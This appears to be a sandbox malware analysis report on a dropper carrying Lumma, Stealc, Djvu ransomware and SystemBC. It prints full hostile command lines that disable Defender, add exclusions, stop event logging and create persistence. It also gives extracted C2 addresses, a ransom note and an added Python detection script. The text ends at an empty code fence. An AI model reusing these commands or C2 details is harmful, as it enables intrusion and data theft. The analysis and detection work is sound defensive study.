Windows
Analysis Report
3QKcKCEzYP.exe
Overview
General Information
Sample name: | 3QKcKCEzYP.exe (renamed because the original name is a hash value) |
Original sample name: | 7db3e0a15ff5d498fd56aab3ceb8b968.exe |
Analysis ID: | 1496361 |
MD5: | 7db3e0a15ff5d498fd56aab3ceb8b968 |
SHA1: | d16db762e8ca0fc4f82b12119fad118c5f386217 |
SHA256: | 1e1bc32c5d4d0cae5310d34827be61eb087dc6aca7a7d767c77529b41e720a81 |
Tags: | exeStop |
Detection
LummaC, Djvu, Go Injector, LummaC Stealer, Neoreklami, Stealc, SystemBC
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Djvu Ransomware
Yara detected Go Injector
Yara detected LummaC Stealer
Yara detected Neoreklami
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected SystemBC
Yara detected Xmrig cryptocurrency miner
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates HTML files with .exe extension (expired dropper behavior)
Drops PE files to the document folder of the user
Found direct / indirect Syscall (likely to bypass EDR)
Found strings related to Crypto-Mining
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies Windows Defender protection settings
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Overwrites code with unconditional jumps - possibly setting hooks in foreign process
PE file contains section with special chars
Performs DNS queries to domains with low reputation
Queries Google from non browser process on port 80
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Scheduled Task Creation Involving Temp Folder
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Uses cmd line tools excessively to alter registry or file data
Uses powercfg.exe to modify the power settings
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Yara detected Costura Assembly Loader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Installs a raw input device (often for capturing keystrokes)
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- 3QKcKCEzYP.exe (PID: 4032 cmdline: "C:\Users\user\Desktop\3QKcKCEzYP.exe" MD5: 7DB3E0A15FF5D498FD56AAB3CEB8B968)
- fOzLadrzZNRnwv2woTdiFoXM.exe (PID: 4304 cmdline: C:\Users\user\Documents\piratemamm\fOzLadrzZNRnwv2woTdiFoXM.exe MD5: 993F5FDF3BD55F35661293167E39649A)
- MSBuild.exe (PID: 4896 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
- MrBEu6cm6HagE9yrmXV8x4AG.exe (PID: 6096 cmdline: C:\Users\user\Documents\piratemamm\MrBEu6cm6HagE9yrmXV8x4AG.exe MD5: 006EDF0AC466164DDC9E0AC56474FE0A)
- r0bVQRH8Dto7infNi6DOB01w.exe (PID: 1548 cmdline: C:\Users\user\Documents\piratemamm\r0bVQRH8Dto7infNi6DOB01w.exe MD5: 6685BAAC90C11334FF11841BFA22E61B)
- Install.exe (PID: 5668 cmdline: .\Install.exe MD5: 26775D5C2D6D7D007426B7F6B97139D9)
- Install.exe (PID: 3164 cmdline: .\Install.exe /uSdidZODwd "525403" /S MD5: 1FB6BC61C7538FE32C88454B5082B7DC)
- cmd.exe (PID: 3992 cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- forfiles.exe (PID: 5224 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 420 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 6324 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- forfiles.exe (PID: 5832 cmdline: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 5552 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 2876 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- forfiles.exe (PID: 3924 cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 1824 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 3472 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- forfiles.exe (PID: 6128 cmdline: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 4832 cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- reg.exe (PID: 4392 cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6 MD5: CDD462E86EC0F20DE2A1D781928B1B0C)
- forfiles.exe (PID: 776 cmdline: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" MD5: D95C443851F70F77427B3183B1619DD3)
- cmd.exe (PID: 2276 cmdline: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- forfiles.exe (PID: 6516 cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True" MD5: D95C443851F70F77427B3183B1619DD3)
- conhost.exe (PID: 5332 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 7000 cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
- powershell.exe (PID: 5232 cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- WMIC.exe (PID: 7140 cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True MD5: E2DE6500DE1148C7F6027AD50AC8B891)
- schtasks.exe (PID: 1280 cmdline: schtasks /CREATE /TN "bhigQxvKbgfszOKTET" /SC once /ST 02:33:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS27CB.tmp\Install.exe\" kd /CVdidr 525403 /S" /V1 /F MD5: 48C2FE20575769DE916F48EF0676A965)
- zVS6xq86P4Kl0c26CfULXfv4.exe (PID: 2968 cmdline: C:\Users\user\Documents\piratemamm\zVS6xq86P4Kl0c26CfULXfv4.exe MD5: 8447DBE44AA2EDE5D56341E0DC22F319)
- powercfg.exe (PID: 6368 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 1936 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 2420 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 1460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 2276 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 1280 cmdline: powershell start-process -WindowStyle Hidden gpupdate.exe /force MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- gpupdate.exe (PID: 876 cmdline: "C:\Windows\system32\gpupdate.exe" /force MD5: 6DC3720EA74B49C8ED64ACA3E0162AC8)
- conhost.exe (PID: 5536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- conhost.exe (PID: 3492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 5024 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 3852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 3872 cmdline: C:\Windows\system32\sc.exe delete "KSKIUXEH" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 2156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- Conhost.exe (PID: 6612 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 4488 cmdline: C:\Windows\system32\sc.exe create "KSKIUXEH" binpath= "C:\ProgramData\kttbjzxfyqcy\erzljnhmzkuz.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 2988 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 5504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- sc.exe (PID: 4592 cmdline: C:\Windows\system32\sc.exe start "KSKIUXEH" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
- conhost.exe (PID: 2432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- 6UF1Jcwj34zqEggktO7mg1WS.exe (PID: 364 cmdline: C:\Users\user\Documents\piratemamm\6UF1Jcwj34zqEggktO7mg1WS.exe MD5: 902F14B6F32CC40A82D6A0F2C41208EC)
- yZBxqqQICO50PLfWYKwJeSL5.exe (PID: 6792 cmdline: C:\Users\user\Documents\piratemamm\yZBxqqQICO50PLfWYKwJeSL5.exe MD5: D4FCA59C99D8D70ACA5744D147E37C03)
- erzljnhmzkuz.exe (PID: 6780 cmdline: C:\ProgramData\kttbjzxfyqcy\erzljnhmzkuz.exe MD5: 8447DBE44AA2EDE5D56341E0DC22F319)
- powercfg.exe (PID: 2704 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 3504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 5564 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 6648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powercfg.exe (PID: 500 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
- conhost.exe (PID: 6828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cleanup
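The process tree above is the most actionable part of this report: Defender policy keys set to "Allow" for specific threat IDs (ThreatIDDefaultAction data 6 means Allow), an exclusion for every .exe added through WMIC, a SYSTEM scheduled task pointing into %TEMP%, powercfg timeouts zeroed so the miner is never suspended, the EventLog service stopped, and a service installed from C:\ProgramData. The following is an added example, not part of the Joe Sandbox report and not the Sigma project's rules: command-line detection logic modelled on the Sigma hits listed above, run over constructed process-creation events whose command lines are copied from the tree (the two benign control events with PIDs 9998 and 9999 are made up).

```python
"""Flag the Defender-tampering, persistence and anti-sleep command lines seen in
the process tree.  Added example; rules are modelled on the report's Sigma hits."""
import re

# Rule table: (name, regexes that must ALL match the command line, case-insensitively).
RULES = [
    # reg add ...\Windows Defender\Threats\ThreatIDDefaultAction ... /d 6
    # Data 6 is "Allow": the named threat IDs are whitelisted by policy.
    ("defender_threat_allowed",
     [r"ThreatIDDefaultAction", r"/d\s+6\b"]),
    # WMIC path to Add-MpPreference (here ExclusionExtension=exe).
    ("defender_exclusion_added",
     [r"MSFT_MpPreference", r"\bcall\s+Add\b", r"Exclusion(Path|Extension|Process)"]),
    # Scheduled task running a binary out of a Temp folder as SYSTEM.
    ("schtasks_temp_as_system",
     [r"\bschtasks\b", r"/create\b", r'/ru\s+"?system\b', r"\\temp\\"]),
    # powercfg /x <standby|hibernate|monitor>-timeout-<ac|dc> 0: never sleep.
    ("powercfg_timeout_zero",
     [r"\bpowercfg(\.exe)?\b",
      r"[/-](x|change)\s+-?(standby|hibernate|monitor)-timeout-(ac|dc)\s+0\b"]),
    # sc stop eventlog: kill Windows event logging.
    ("eventlog_service_stopped",
     [r"\bsc(\.exe)?\s+stop\s+eventlog\b"]),
    # New service whose binary lives under C:\ProgramData.
    ("service_from_programdata",
     [r"\bsc(\.exe)?\s+create\b", r'binpath=\s*"?c:\\programdata\\']),
    # forfiles /c "cmd ..." used as a LOLBin proxy for the reg/powershell commands.
    ("forfiles_proxy_execution",
     [r"\bforfiles(\.exe)?\b", r'/c\s+"?cmd\b']),
]


def match_rules(cmdline):
    """Return the names of every rule whose patterns all match cmdline."""
    return [name for name, pats in RULES
            if all(re.search(p, cmdline, re.IGNORECASE) for p in pats)]


def scan(events):
    """Map pid -> list of triggered rule names, for events that trigger at least one."""
    hits = {}
    for ev in events:
        names = match_rules(ev["cmdline"])
        if names:
            hits[ev["pid"]] = names
    return hits


# Constructed process-creation events: command lines copied from the process tree,
# plus two benign controls (PIDs 9998/9999 are made up).
EVENTS = [
    {"pid": 6324, "image": "reg.exe",
     "cmdline": r'reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6'},
    {"pid": 7140, "image": "WMIC.exe",
     "cmdline": r'"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True'},
    {"pid": 1280, "image": "schtasks.exe",
     "cmdline": r'schtasks /CREATE /TN "bhigQxvKbgfszOKTET" /SC once /ST 02:33:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\7zS27CB.tmp\Install.exe\" kd /CVdidr 525403 /S" /V1 /F'},
    {"pid": 6368, "image": "powercfg.exe",
     "cmdline": r'C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0'},
    {"pid": 2988, "image": "sc.exe",
     "cmdline": r'C:\Windows\system32\sc.exe stop eventlog'},
    {"pid": 4488, "image": "sc.exe",
     "cmdline": r'C:\Windows\system32\sc.exe create "KSKIUXEH" binpath= "C:\ProgramData\kttbjzxfyqcy\erzljnhmzkuz.exe" start= "auto"'},
    {"pid": 5224, "image": "forfiles.exe",
     "cmdline": r'forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"'},
    {"pid": 9998, "image": "reg.exe",
     "cmdline": r'reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v ProductName'},
    {"pid": 9999, "image": "powercfg.exe",
     "cmdline": r'powercfg.exe /list'},
]

if __name__ == "__main__":
    for pid, names in scan(EVENTS).items():
        print(pid, ", ".join(names))
```

Note that the forfiles event trips two rules: the proxy-execution pattern and, because the inner `reg add` is visible in its command line, the ThreatIDDefaultAction rule. Matching the inner command at the parent is deliberate; a rule that only looked at reg.exe would still fire on the child, but the parent hit is what links the Defender change to the `forfiles` chain.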
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
STOP, Djvu | STOP/Djvu is a ransomware family that encrypts user data with AES-256 and appends one of dozens of available extensions to the encrypted file's name as a marker. It does not encrypt the entire file, only the first 5 MB. In its original version it was able to run offline and in that case used a hard-coded key, which could be extracted to decrypt files. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
Stealc | Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, browser extensions and desktop cryptocurrency wallet applications, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests. | No Attribution |
Name | Description | Attribution | Blogpost URLs | Link |
---|---|---|---|---|
SystemBC | SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on an underground marketplace, Proofpoint decided to call it SystemBC. SystemBC has been observed occasionally, but more pronounced since June 2019. The first samples go back to October 2018. | No Attribution |
{"C2 url": "http://193.176.190.41/2fa883eebd632382.php"}
{"C2 url": ["consciousourwi.shop", "interactiedovspm.shop", "torubleeodsmzo.shop", "cagedwifedsozm.shop", "weiggheticulop.shop", "charecteristicdxp.shop", "potentioallykeos.shop", "deicedosmzj.shop", "southedhiscuso.shop"], "Build id": "a8kafm--@cloudcosmic"}
{"Download URLs": [""], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0874PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", 
"C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsZOJbLC8rdQ3RNFdWJ9l\\\\nsRHwDxjXZCN4K9IEo3ccj2X7KVzvLXJ\\/I+jMWoFDgbTA5TMMDPMhlSykGYr1rbX9\\\\ntDxs5EL7FC3R6jbLzQ+QVdvG2Slvd1aEiSAhkrB6Z97DC28ixTGkA4aCQKKFT5ge\\\\nSXPpDStS2N3zeiWPCMkOs9RErtxVW9sXoWRAFtBg2kSHTyKEWcRqnxplrJGdVQKU\\\\n0DxDnHDefnxaf\\/3VSRczBwGZlq\\/Mr2bfHM2Mf8JWmYztlmGbjGb\\/\\/oixuuRePxzt\\\\n6xgozgVrC64HnagNFyODdlk2w\\/BpJWXIbgivZ0kR40Ll3NEAl3Z26cIkIc6pAJ3s\\\\nfwIDAQAB\\\\n-----END PUBLIC KEY-----"}
{"HOST1": "claywyaeropumps.com", "HOST2": "178.132.2.10", "DNS1": "5.132.191.104", "DNS2": "ns1.vic.au.dns.opennic.glue", "DNS3": "ns2.vic.au.dns.opennic.glue"}
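The Djvu configuration above carries the RSA public key the sample uses, printed with the report's JSON escaping still in place (`\\/` for a slash, `\\\\n` for a newline). When triaging such a dump it is worth pulling the key parameters and a stable fingerprint out of that blob, so the key can be compared across samples and against key lists maintained for decryptors. The following is an added example, not part of the Joe Sandbox report; it uses only the Python standard library, walks the SubjectPublicKeyInfo DER structure by hand, and embeds the key value exactly as the report prints it (the only input it assumes).

```python
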